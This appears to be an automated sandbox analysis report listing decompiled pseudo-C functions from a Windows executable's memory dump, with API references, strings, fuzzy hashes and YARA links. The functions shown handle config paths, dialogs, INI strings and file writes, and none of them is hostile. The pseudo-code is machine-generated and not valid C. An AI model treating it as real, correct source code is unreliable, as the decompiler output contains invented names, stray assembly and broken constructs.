C-Code - Quality: 91%

			E004034F0(void* __ecx, void* __eflags, intOrPtr* _a4) {
				intOrPtr _v20;
				char _v1072;
				void _v3672;
				char _v4496;
				intOrPtr _v4556;
				char _v4560;
				void* __edi;
				void* __esi;
				intOrPtr* _t41;
				void* _t45;

				_t45 = __eflags;
				E0040B550(0x11cc, __ecx);
				E00402923( &_v4560);
				_v4560 = 0x40db44;
				E00406670( &_v4496, _t45);
				_v4496 = 0x40dab0;
				memset( &_v3672, 0, 0x10);
				E0040A909( &_v1072);
				_t41 = _a4;
				_v4556 = 0x71;
				if(E00402CD5( &_v4560,  *((intOrPtr*)(_t41 + 0x10))) != 0) {
					L0040B266();
					 *((intOrPtr*)( *_t41 + 4))(1, _v20, _t41 + 0x5b2c, 0xa);
				}
				_v4496 = 0x40dab0;
				_v4560 = 0x40db44;
				E004067AC( &_v4496);
				return E00402940( &_v4560);
			}

0x004034f0
0x004034f8
0x00403506
0x00403516
0x0040351c
0x00403531
0x00403537
0x00403545
0x0040354a
0x00403556
0x00403567
0x00403575
0x00403583
0x00403583
0x00403586
0x00403592
0x00403598
0x004035ac

APIs

Part of subcall function 00402923: memset.MSVCRT ref: 00402935

Part of subcall function 00406670: ??2@YAPAXI@Z.MSVCRT ref: 004066B9
Part of subcall function 00406670: ??2@YAPAXI@Z.MSVCRT ref: 004066E0
Part of subcall function 00406670: ??2@YAPAXI@Z.MSVCRT ref: 00406701
Part of subcall function 00406670: ??2@YAPAXI@Z.MSVCRT ref: 00406722

memset.MSVCRT ref: 00403537
_ultow.MSVCRT ref: 00403575

Strings

q, xrefs: 00403556
cf@, xrefs: 0040352B

Memory Dump Source

Source File: 0000000B.00000002.765299498.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.765285312.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.765314693.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.765324867.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000000B.00000002.765331164.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: ??2@$memset$_ultow
String ID: cf@$q
API String ID: 3448780718-2693627795
Opcode ID: 5a770fb105266b5f281bf636f392918a38755f6c8491aba89f246a667f584aac
Instruction ID: aa1ed1bb2df2d11c17fc3d40a8ec787ac421495c908f782690464d4e039b4fd8
Opcode Fuzzy Hash: 5a770fb105266b5f281bf636f392918a38755f6c8491aba89f246a667f584aac
Instruction Fuzzy Hash: 73113079A402186ACB24AB55DC41BCDB7B4AF45304F0084BAEB09771C1D7796E888FD8

Uniqueness

Uniqueness Score: -1.00%

Function 00402F31, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 47
COMMON

Download Yara Rule

C-Code - Quality: 83%

			E00402F31(void* _a4) {
				void _v530;
				long _v532;
				void* __edi;
				wchar_t* _t15;
				intOrPtr _t18;
				short* _t19;
				void* _t29;

				_v532 = _v532 & 0x00000000;
				memset( &_v530, 0, 0x208);
				E00404AD9( &_v532);
				_t15 = wcsrchr( &_v532, 0x2e);
				if(_t15 != 0) {
					 *_t15 =  *_t15 & 0x00000000;
				}
				wcscat( &_v532, L".cfg");
				_t18 =  *0x40fa74; // 0x4101c8
				_t19 = _t18 + 0x5504;
				_t36 =  *_t19;
				_pop(_t29);
				if( *_t19 != 0) {
					E00404923(0x104,  &_v532, _t19);
					_pop(_t29);
				}
				return E00402FC6(_t29, _t36,  &_v532);
			}

0x00402f3a
0x00402f51
0x00402f60
0x00402f6f
0x00402f78
0x00402f7a
0x00402f7a
0x00402f8a
0x00402f8f
0x00402f94
0x00402f99
0x00402f9e
0x00402f9f
0x00402fad
0x00402fb2
0x00402fb2
0x00402fc5

APIs

memset.MSVCRT ref: 00402F51

Part of subcall function 00404AD9: GetModuleFileNameW.KERNEL32(00000000,e/@,00000104,00402F65,00000000,?,?,00000000), ref: 00404AE4

wcsrchr.MSVCRT ref: 00402F6F
wcscat.MSVCRT ref: 00402F8A

Strings

.cfg, xrefs: 00402F84

Memory Dump Source

Source File: 0000000B.00000002.765299498.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.765285312.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.765314693.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.765324867.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000000B.00000002.765331164.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: FileModuleNamememsetwcscatwcsrchr
String ID: .cfg
API String ID: 776488737-3410578098
Opcode ID: 728259185716957c59a96a9101d5f0e08b84084941d0fa3c3d1a3b0935b5c9f5
Instruction ID: 9e44addaa5645187fa8e636e844442f878cb26b9c6a589516f43c5b5973a5f2a
Opcode Fuzzy Hash: 728259185716957c59a96a9101d5f0e08b84084941d0fa3c3d1a3b0935b5c9f5
Instruction Fuzzy Hash: D501487254420C9ADB20E755DD8AFCA73BCEB54314F1008BBA514F61C1D7F8AAC48A9C

Uniqueness

Uniqueness Score: -1.00%

Function 00407E24, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 43
COMMON

Download Yara Rule

C-Code - Quality: 64%

			E00407E24(intOrPtr* __ecx, intOrPtr _a4) {
				void _v514;
				signed short _v516;
				void _v1026;
				signed short _v1028;
				void* __esi;
				void* _t17;
				intOrPtr* _t26;
				signed short* _t28;

				_v516 = _v516 & 0x00000000;
				_t26 = __ecx;
				memset( &_v514, 0, 0x1fc);
				_v1028 = _v1028 & 0x00000000;
				memset( &_v1026, 0, 0x1fc);
				_t17 =  *((intOrPtr*)( *_t26 + 0x24))();
				_t28 =  &_v516;
				E00407250(_t28, _t17);
				_push(_t28);
				_push(L"</%s>\r\n");
				_push(0xff);
				_push( &_v1028);
				L0040B1EC();
				return E00407343(_t26, _a4,  &_v1028);
			}

0x00407e2d
0x00407e46
0x00407e48
0x00407e4d
0x00407e5f
0x00407e6b
0x00407e6f
0x00407e75
0x00407e7c
0x00407e7d
0x00407e88
0x00407e8d
0x00407e8e
0x00407eaa

APIs

memset.MSVCRT ref: 00407E48
memset.MSVCRT ref: 00407E5F

Part of subcall function 00407250: wcscpy.MSVCRT ref: 00407255
Part of subcall function 00407250: _wcslwr.MSVCRT ref: 00407288

_snwprintf.MSVCRT ref: 00407E8E

Strings

</%s>, xrefs: 00407E7D

Memory Dump Source

Source File: 0000000B.00000002.765299498.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.765285312.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.765314693.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.765324867.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000000B.00000002.765331164.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: memset$_snwprintf_wcslwrwcscpy
String ID: </%s>
API String ID: 3400436232-259020660
Opcode ID: 8ed6d9153b8ab756a1282c4525cb1f33682d7d4062ac2741ec7bca21e753fd7d
Instruction ID: 202c728a503fdded71e402cbdefdfedacf6d04e10f6749ebe2a15fa747ba2321
Opcode Fuzzy Hash: 8ed6d9153b8ab756a1282c4525cb1f33682d7d4062ac2741ec7bca21e753fd7d
Instruction Fuzzy Hash: 820186B2D4012966D720A795CC46FEE766CEF44318F0004FABB08F71C2DB78AB458AD8

Uniqueness

Uniqueness Score: -1.00%

Function 00405E0A, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 39
COMMON

Download Yara Rule

C-Code - Quality: 77%

			E00405E0A(intOrPtr __ecx, void* __eflags, struct HWND__* _a4) {
				void _v8198;
				short _v8200;
				void* _t9;
				void* _t12;
				intOrPtr _t19;
				intOrPtr _t20;

				_t19 = __ecx;
				_t9 = E0040B550(0x2004, __ecx);
				_t20 = _t19;
				if(_t20 == 0) {
					_t20 =  *0x40fe24; // 0x0
				}
				_t25 =  *0x40fb90;
				if( *0x40fb90 != 0) {
					_v8200 = _v8200 & 0x00000000;
					memset( &_v8198, 0, 0x2000);
					_push(_t20);
					_t12 = 5;
					E00405E8D(_t12);
					if(E00405F39(_t19, _t25, L"caption",  &_v8200) != 0) {
						SetWindowTextW(_a4,  &_v8200);
					}
					return EnumChildWindows(_a4, E00405DAC, 0);
				}
				return _t9;
			}

APIs

memset.MSVCRT ref: 00405E44
SetWindowTextW.USER32(?,?), ref: 00405E74
EnumChildWindows.USER32 ref: 00405E84

Strings

caption, xrefs: 00405E59

Memory Dump Source

Source File: 0000000B.00000002.765299498.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.765285312.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.765314693.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.765324867.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000000B.00000002.765331164.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: ChildEnumTextWindowWindowsmemset
String ID: caption
API String ID: 1523050162-4135340389
Opcode ID: 8feeb8209b6c70e9adfa8bd3f92da79707fac4aecb0355a736b6ddf0df3d27b2
Instruction ID: ff9fcce37bd20e8a069aa1bb12297d26d3abb42d57bfe77991e9b0a8e19eae59
Opcode Fuzzy Hash: 8feeb8209b6c70e9adfa8bd3f92da79707fac4aecb0355a736b6ddf0df3d27b2
Instruction Fuzzy Hash: 2DF04432940718AAEB20AB54DD4EB9B3668DB04754F0041B7BA04B61D2D7B8AE40CEDC

Uniqueness

Uniqueness Score: -1.00%

Function 00409A46, Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 31
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00409A46(struct HINSTANCE__** __eax, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
				struct HINSTANCE__* _t11;
				struct HINSTANCE__** _t14;
				struct HINSTANCE__* _t15;

				_t14 = __eax;
				if( *((intOrPtr*)(__eax)) == 0) {
					_t11 = E00405436(L"winsta.dll");
					 *_t14 = _t11;
					if(_t11 != 0) {
						_t14[1] = GetProcAddress(_t11, "WinStationGetProcessSid");
					}
				}
				_t15 = _t14[1];
				if(_t15 == 0) {
					return 0;
				} else {
					return _t15->i(0, _a4, _a16, _a20, _a8, _a12);
				}
			}

0x00409a4a
0x00409a4f
0x00409a56
0x00409a5e
0x00409a60
0x00409a6e
0x00409a6e
0x00409a60
0x00409a71
0x00409a76
0x00000000
0x00409a78
0x00000000
0x00409a89

APIs

Part of subcall function 00405436: memset.MSVCRT ref: 00405456
Part of subcall function 00405436: wcscat.MSVCRT ref: 00405478
Part of subcall function 00405436: LoadLibraryW.KERNELBASE(00000000), ref: 00405489
Part of subcall function 00405436: LoadLibraryW.KERNEL32(?), ref: 00405492

GetProcAddress.KERNEL32(00000000,WinStationGetProcessSid), ref: 00409A68

Strings

Y@, xrefs: 00409A46
WinStationGetProcessSid, xrefs: 00409A62
winsta.dll, xrefs: 00409A51

Memory Dump Source

Source File: 0000000B.00000002.765299498.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.765285312.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.765314693.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.765324867.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000000B.00000002.765331164.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: LibraryLoad$AddressProcmemsetwcscat
String ID: WinStationGetProcessSid$winsta.dll$Y@
API String ID: 946536540-379566740
Opcode ID: 1b7ebfe453553e3f98933d91fdad94fbea9a23791565fec376d5a3071c2edda0
Instruction ID: f8fd4ca1437852706c932511ef9fc121d1f4ef25cad53c4396aefa54a2cc69ea
Opcode Fuzzy Hash: 1b7ebfe453553e3f98933d91fdad94fbea9a23791565fec376d5a3071c2edda0
Instruction Fuzzy Hash: 4AF08236644219AFCF219FE09C01B977BD5AB08710F00443AF945B21D1D67588509F98

Uniqueness

Uniqueness Score: -1.00%

Function 0040588E, Relevance: 6.1, APIs: 4, Instructions: 63
COMMON

Download Yara Rule

C-Code - Quality: 93%

			E0040588E(void** __esi, intOrPtr _a4, intOrPtr _a8) {
				signed int _t21;
				signed int _t23;
				void* _t24;
				signed int _t31;
				void* _t33;
				void* _t44;
				signed int _t46;
				void* _t48;
				signed int _t51;
				int _t52;
				void** _t53;
				void* _t58;

				_t53 = __esi;
				_t1 =  &(_t53[1]); // 0x0
				_t51 =  *_t1;
				_t21 = 0;
				if(_t51 <= 0) {
					L4:
					_t2 =  &(_t53[2]); // 0x8
					_t33 =  *_t53;
					_t23 =  *_t2 + _t51;
					_t46 = 8;
					_t53[1] = _t23;
					_t24 = _t23 * _t46;
					_push( ~(0 | _t58 > 0x00000000) | _t24);
					L0040B26C();
					_t10 =  &(_t53[1]); // 0x0
					 *_t53 = _t24;
					memset(_t24, 0,  *_t10 << 3);
					_t52 = _t51 << 3;
					memcpy( *_t53, _t33, _t52);
					if(_t33 != 0) {
						_push(_t33);
						L0040B272();
					}
					 *((intOrPtr*)( *_t53 + _t52)) = _a4;
					 *((intOrPtr*)(_t52 +  *_t53 + 4)) = _a8;
				} else {
					_t44 =  *__esi;
					_t48 = _t44;
					while( *_t48 != 0) {
						_t21 = _t21 + 1;
						_t48 = _t48 + 8;
						_t58 = _t21 - _t51;
						if(_t58 < 0) {
							continue;
						} else {
							goto L4;
						}
						goto L7;
					}
					_t31 = _t21 << 3;
					 *((intOrPtr*)(_t44 + _t31)) = _a4;
					 *((intOrPtr*)(_t31 +  *_t53 + 4)) = _a8;
				}
				L7:
				return 1;
			}

APIs

??2@YAPAXI@Z.MSVCRT ref: 004058C3
memset.MSVCRT ref: 004058D4
memcpy.MSVCRT ref: 004058E0
??3@YAXPAX@Z.MSVCRT ref: 004058ED

Memory Dump Source

Source File: 0000000B.00000002.765299498.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.765285312.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.765314693.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.765324867.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000000B.00000002.765331164.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: ??2@??3@memcpymemset
String ID:
API String ID: 1865533344-0
Opcode ID: 842e7f25b611a1b365b40b1c94d0ccd91a374462c013338e9ea48621bac1a915
Instruction ID: bfbe461037e943c94cde62efea7f8de8011d206b5eb27adb1998baad11e83e26
Opcode Fuzzy Hash: 842e7f25b611a1b365b40b1c94d0ccd91a374462c013338e9ea48621bac1a915
Instruction Fuzzy Hash: 9F116A722046019FD328DF2DC881A2BF7E5EFD8300B248C2EE49A97395DB35E801CB58

Uniqueness

Uniqueness Score: -1.00%

Function 00409DDC, Relevance: 6.1, APIs: 4, Instructions: 55
COMMON

Download Yara Rule

C-Code - Quality: 35%

			E00409DDC(intOrPtr* __ecx, void* __eflags, intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, intOrPtr _a16, WCHAR* _a20) {
				char _v16390;
				short _v16392;
				void* __edi;
				intOrPtr* _t30;
				intOrPtr* _t34;
				signed int _t36;
				signed int _t37;

				_t30 = __ecx;
				E0040B550(0x4004, __ecx);
				_push(0x4000);
				_push(0);
				_v16392 = 0;
				_t34 = _t30;
				_push( &_v16390);
				if(_a4 == 0) {
					memset();
					GetPrivateProfileStringW(_a8, _a12, 0x40c4e8,  &_v16392, 0x2000, _a20);
					asm("sbb esi, esi");
					_t37 =  ~_t36;
					E004051B8( &_v16392, _t34, _a16);
				} else {
					memset();
					E0040512F(_a16,  *_t34,  &_v16392);
					_t37 = WritePrivateProfileStringW(_a8, _a12,  &_v16392, _a20);
				}
				return _t37;
			}

APIs

memset.MSVCRT ref: 00409E08

Part of subcall function 0040512F: _snwprintf.MSVCRT ref: 00405174
Part of subcall function 0040512F: memcpy.MSVCRT ref: 00405184

WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 00409E31
memset.MSVCRT ref: 00409E3B
GetPrivateProfileStringW.KERNEL32 ref: 00409E5D

Memory Dump Source

Source File: 0000000B.00000002.765299498.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.765285312.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.765314693.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.765324867.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000000B.00000002.765331164.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: PrivateProfileStringmemset$Write_snwprintfmemcpy
String ID:
API String ID: 1127616056-0
Opcode ID: 58dd6d091b48cbb0307dc7b23365382c2a8386e907ab43d681c23093a5f2522d
Instruction ID: edc1d82326a177a4eed1c31c26edb3d60bf211bedf20f6070ddf32627235df0d
Opcode Fuzzy Hash: 58dd6d091b48cbb0307dc7b23365382c2a8386e907ab43d681c23093a5f2522d
Instruction Fuzzy Hash: A9117071500119AFDF11AF64DD06E9E7BA9EF04704F1000BAFB05B6191E7319E608BAD

Uniqueness

Uniqueness Score: -1.00%

Function 0040ACFC, Relevance: 6.1, APIs: 4, Instructions: 53
COMMON

Download Yara Rule

C-Code - Quality: 37%

			E0040ACFC(wchar_t* __esi, char _a4, intOrPtr _a8) {
				void* _v8;
				wchar_t* _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				char _v40;
				long _v564;
				char* _t18;
				char* _t22;
				wchar_t* _t23;
				intOrPtr* _t24;
				intOrPtr* _t26;
				intOrPtr _t30;
				void* _t35;
				char* _t36;

				_t18 =  &_v8;
				_t30 = 0;
				__imp__SHGetMalloc(_t18);
				if(_t18 >= 0) {
					_v40 = _a4;
					_v28 = _a8;
					_t22 =  &_v40;
					_v36 = 0;
					_v32 = 0;
					_v24 = 4;
					_v20 = E0040AC81;
					_v16 = __esi;
					__imp__SHBrowseForFolderW(_t22, _t35);
					_t36 = _t22;
					if(_t36 != 0) {
						_t23 =  &_v564;
						__imp__SHGetPathFromIDListW(_t36, _t23);
						if(_t23 != 0) {
							_t30 = 1;
							wcscpy(__esi,  &_v564);
						}
						_t24 = _v8;
						 *((intOrPtr*)( *_t24 + 0x14))(_t24, _t36);
						_t26 = _v8;
						 *((intOrPtr*)( *_t26 + 8))(_t26);
					}
				}
				return _t30;
			}

APIs

SHGetMalloc.SHELL32(?), ref: 0040AD0C
SHBrowseForFolderW.SHELL32(?), ref: 0040AD3E
SHGetPathFromIDListW.SHELL32(00000000,?), ref: 0040AD52
wcscpy.MSVCRT ref: 0040AD65

Memory Dump Source

Source File: 0000000B.00000002.765299498.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.765285312.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.765314693.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.765324867.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000000B.00000002.765331164.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: BrowseFolderFromListMallocPathwcscpy
String ID:
API String ID: 3917621476-0
Opcode ID: 2a6e8ca006a625361a9e73932945a98b974e7be3bf153fbb13282c81ef302996
Instruction ID: e4c3f7e47c5e56e8be22c5f757262c1ae757d72ab7f138bc7c026954c7aa5c2b
Opcode Fuzzy Hash: 2a6e8ca006a625361a9e73932945a98b974e7be3bf153fbb13282c81ef302996
Instruction Fuzzy Hash: B011FAB5900208EFDB10EFA9D9889AEB7F8FF48300F10416AE905E7240D738DA05CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 00404A44, Relevance: 6.0, APIs: 4, Instructions: 47
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00404A44(void* __ecx, struct HWND__* _a4, int _a8, intOrPtr _a12) {
				long _v8;
				long _v12;
				long _t13;
				void* _t14;
				struct HWND__* _t24;

				_t24 = GetDlgItem(_a4, _a8);
				_t13 = SendMessageW(_t24, 0x146, 0, 0);
				_v12 = _t13;
				_v8 = 0;
				if(_t13 <= 0) {
					L3:
					_t14 = 0;
				} else {
					while(SendMessageW(_t24, 0x150, _v8, 0) != _a12) {
						_v8 = _v8 + 1;
						if(_v8 < _v12) {
							continue;
						} else {
							goto L3;
						}
						goto L4;
					}
					SendMessageW(_t24, 0x14e, _v8, 0);
					_t14 = 1;
				}
				L4:
				return _t14;
			}

APIs

GetDlgItem.USER32 ref: 00404A52
SendMessageW.USER32(00000000,00000146,00000000,00000000), ref: 00404A6A
SendMessageW.USER32(00000000,00000150,00000000,00000000), ref: 00404A80
SendMessageW.USER32(00000000,0000014E,00000000,00000000), ref: 00404AA3

Memory Dump Source

Source File: 0000000B.00000002.765299498.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.765285312.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.765314693.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.765324867.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000000B.00000002.765331164.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: MessageSend$Item
String ID:
API String ID: 3888421826-0
Opcode ID: 8e654b4fb51c2e6e0140a28d1ff35be7b55d0d95af2e0242a2f6fa2b8df4bf67
Instruction ID: a803108f18d13bdb161ef9cfeaea96f484be20865a03d7d0c1e8cd60aac843f5
Opcode Fuzzy Hash: 8e654b4fb51c2e6e0140a28d1ff35be7b55d0d95af2e0242a2f6fa2b8df4bf67
Instruction Fuzzy Hash: 02F01DB1A4010CFEEB018FD59DC1DAF7BBDEB89755F104479F604E6150D2709E41AB64

Uniqueness

Uniqueness Score: -1.00%

Function 004072D8, Relevance: 6.0, APIs: 4, Instructions: 41
filestringCOMMON

Download Yara Rule

C-Code - Quality: 93%

			E004072D8(void* __ecx, void* __eflags, void* _a4, short* _a8) {
				long _v8;
				void _v8199;
				char _v8200;

				E0040B550(0x2004, __ecx);
				_v8200 = 0;
				memset( &_v8199, 0, 0x1fff);
				WideCharToMultiByte(0, 0, _a8, 0xffffffff,  &_v8200, 0x1fff, 0, 0);
				return WriteFile(_a4,  &_v8200, strlen( &_v8200),  &_v8, 0);
			}

0x004072e0
0x004072f7
0x004072fd
0x00407316
0x00407342

APIs

memset.MSVCRT ref: 004072FD
WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,00001FFF,00000000,00000000), ref: 00407316
strlen.MSVCRT ref: 00407328
WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00407339

Memory Dump Source

Source File: 0000000B.00000002.765299498.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.765285312.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.765314693.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.765324867.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000000B.00000002.765331164.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: ByteCharFileMultiWideWritememsetstrlen
String ID:
API String ID: 2754987064-0
Opcode ID: a01a9356340fd52416386d9a0609ab8b35de944153756caad9cad7d66f149dcb
Instruction ID: b20814eff52bbcc052d034fa9df9783175f47b69a9638c3bed99c582471ba408
Opcode Fuzzy Hash: a01a9356340fd52416386d9a0609ab8b35de944153756caad9cad7d66f149dcb
Instruction Fuzzy Hash: E7F0FFB740022CBEEB05A7949DC9DDB776CDB08358F0001B6B715E2192D6749E448BA8

Uniqueness

Uniqueness Score: -1.00%

Function 00408DC8, Relevance: 6.0, APIs: 4, Instructions: 33
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00408DC8(void** __eax, struct HWND__* _a4) {
				int _t7;
				void** _t11;

				_t11 = __eax;
				if( *0x4101b4 == 0) {
					memcpy(0x40f5c8,  *__eax, 0x50);
					memcpy(0x40f2f8,  *(_t11 + 4), 0x2cc);
					 *0x4101b4 = 1;
					_t7 = DialogBoxParamW(GetModuleHandleW(0), 0x6b, _a4, E00408ADB, 0);
					 *0x4101b4 =  *0x4101b4 & 0x00000000;
					 *0x40f2f4 = _t7;
					return 1;
				} else {
					return 1;
				}
			}

0x00408dd0
0x00408dd2
0x00408de2
0x00408df4
0x00408e01
0x00408e1b
0x00408e21
0x00408e28
0x00408e30
0x00408dd4
0x00408dd8
0x00408dd8

APIs

memcpy.MSVCRT ref: 00408DE2
memcpy.MSVCRT ref: 00408DF4
GetModuleHandleW.KERNEL32(00000000), ref: 00408E07
DialogBoxParamW.USER32 ref: 00408E1B

Memory Dump Source

Source File: 0000000B.00000002.765299498.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.765285312.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.765314693.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.765324867.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000000B.00000002.765331164.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: memcpy$DialogHandleModuleParam
String ID:
API String ID: 1386444988-0
Opcode ID: 891701deeecd0a5aff4f8729167f2b3d3e4c53b818b809e7ef3862d897c56b7c
Instruction ID: 2efff09082e6186f10957894d43819ba35d003f4fc085d6afb87634920226402
Opcode Fuzzy Hash: 891701deeecd0a5aff4f8729167f2b3d3e4c53b818b809e7ef3862d897c56b7c
Instruction Fuzzy Hash: FAF08231695310BBD7206BA4BE0AB473AA0D700B16F2484BEF241B54E0C7FA04559BDC

Uniqueness

Uniqueness Score: -1.00%

Function 004050E1, Relevance: 6.0, APIs: 4, Instructions: 32
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004050E1(wchar_t* __edi, wchar_t* _a4) {
				int _t10;
				int _t12;
				void* _t23;
				wchar_t* _t24;
				signed int _t25;

				_t24 = __edi;
				_t25 = wcslen(__edi);
				_t10 = wcslen(_a4);
				_t23 = _t10 + _t25;
				if(_t23 >= 0x3ff) {
					_t12 = _t10 - _t23 + 0x3ff;
					if(_t12 > 0) {
						wcsncat(__edi + _t25 * 2, _a4, _t12);
					}
				} else {
					wcscat(__edi + _t25 * 2, _a4);
				}
				return _t24;
			}

0x004050e1
0x004050ec
0x004050ee
0x004050f5
0x004050ff
0x00405114
0x00405118
0x00405123
0x00405128
0x00405101
0x00405109
0x0040510f
0x0040512e

APIs

wcslen.MSVCRT ref: 004050E3
wcslen.MSVCRT ref: 004050EE
wcscat.MSVCRT ref: 00405109
wcsncat.MSVCRT ref: 00405123

Memory Dump Source

Source File: 0000000B.00000002.765299498.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.765285312.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.765314693.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.765324867.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000000B.00000002.765331164.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: wcslen$wcscatwcsncat
String ID:
API String ID: 291873006-0
Opcode ID: dae96c5ac082cb53d340fe27b4bc8b5cd34b90fa375a26752ac010ecfec8ae38
Instruction ID: d151cadb35ebc04527c95d650d15a6f00d765f1fde14687ca002c1c28d544fc6
Opcode Fuzzy Hash: dae96c5ac082cb53d340fe27b4bc8b5cd34b90fa375a26752ac010ecfec8ae38
Instruction Fuzzy Hash: 3CE0EC36908703AECB042625AC45C6F375DEF84368B50843FF410E6192EF3DD51556DD

Uniqueness

Uniqueness Score: -1.00%

Function 00402DDD, Relevance: 6.0, APIs: 4, Instructions: 30
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00402DDD(struct HWND__* __eax, void* __ecx) {
				void* __edi;
				void* __esi;
				struct HWND__* _t11;
				struct HWND__* _t14;
				struct HWND__* _t15;
				void* _t16;

				_t14 = __eax;
				_t16 = __ecx;
				 *((intOrPtr*)(__ecx + 0x10)) = __eax;
				GetClientRect(__eax, __ecx + 0xa14);
				 *(_t16 + 0xa24) =  *(_t16 + 0xa24) & 0x00000000;
				_t15 = GetWindow(GetWindow(_t14, 5), 0);
				do {
					E00402D99(_t15, _t16);
					_t11 = GetWindow(_t15, 2);
					_t15 = _t11;
				} while (_t15 != 0);
				return _t11;
			}

0x00402de0
0x00402de2
0x00402dec
0x00402def
0x00402dfb
0x00402e0c
0x00402e0e
0x00402e0e
0x00402e16
0x00402e18
0x00402e1a
0x00402e21

APIs

GetClientRect.USER32 ref: 00402DEF
GetWindow.USER32(?,00000005), ref: 00402E07
GetWindow.USER32(00000000), ref: 00402E0A

Part of subcall function 00402D99: GetWindowRect.USER32 ref: 00402DA8
Part of subcall function 00402D99: MapWindowPoints.USER32 ref: 00402DC3

GetWindow.USER32(00000000,00000002), ref: 00402E16

Memory Dump Source

Source File: 0000000B.00000002.765299498.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.765285312.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.765314693.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.765324867.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000000B.00000002.765331164.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: Window$Rect$ClientPoints
String ID:
API String ID: 4235085887-0
Opcode ID: 1c8c52d1646566c0c406de3dcd2af47f97e9d21a3de7b74f78bd3c756d76e5a1
